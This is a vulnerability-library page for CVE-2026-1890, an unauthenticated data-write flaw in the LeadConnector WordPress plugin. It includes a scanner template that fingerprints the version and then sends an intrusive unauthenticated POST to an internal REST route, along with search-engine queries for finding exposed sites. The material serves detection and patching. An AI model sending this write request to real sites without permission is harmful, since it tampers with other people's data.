/Vulnerability Library

LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write

CVE-2026-1890
Early Release

Description

LeadConnector WordPress plugin < 3.0.22 contains a broken access control caused by missing authorization in a REST route, letting unauthenticated attackers overwrite existing data remotely, exploit requires no authentication.

Severity

Medium

CVSS Score

5.3

Exploit Probability

1%

Affected Product

leadconnector

Published Date

July 2, 2026

Template Author

0x_akoko

CVE-2026-1890.yaml
id: CVE-2026-1890

info:
  name: LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write
  author: 0x_Akoko
  severity: medium
  description: |
   LeadConnector WordPress plugin < 3.0.22 contains a broken access control caused by missing authorization in a REST route, letting unauthenticated attackers overwrite existing data remotely, exploit requires no authentication.
  impact: |
   Unauthenticated attackers can overwrite existing data, potentially leading to data tampering and loss of integrity.
  remediation: |
   Update to version 3.0.22 or later.
  reference:
    - https://wpscan.com/vulnerability/9b88be70-b5cc-4a3f-a871-64d61cb02076/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1890
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-1890
    epss-score: 0.00645
    epss-percentile: 0.46545
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 2
    vendor: leadconnector
    product: leadconnector
    fofa-query: body="/wp-content/plugins/leadconnector/"
    shodan-query: http.html:"leadconnector"
    tags: cve,cve2026,wordpress,wp-plugin,leadconnector,unauth,rest-api,intrusive,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/leadconnector/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "LeadConnector")'
          - 'compare_versions(lsversion, ">=1.0.0", "<=3.0.21")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: lsversion
        internal: true
        regex:
          - 'Stable tag: ([\d.]+)'
        group: 1

  - raw:
      - |
        POST /wp-json/lc_internal_api/v1/save_custom_values HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"custom_values":[{"fieldKey":"{{randstr}}","id":"1"}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "status", "success")'
        condition: and
# digest: 4a0a00473045022100fb947a688494c002418949a721fd1e38404730060347726521ee7ffdfa2dda13022005352a4aaed30366613a710f8634081f1194667c88744a1094795c515f7e150e:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE ID:
cve-2026-1890
CWE ID:
cwe-862

References

https://wpscan.com/vulnerability/9b88be70-b5cc-4a3f-a871-64d61cb02076/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1890

Remediation Steps

Update to version 3.0.22 or later.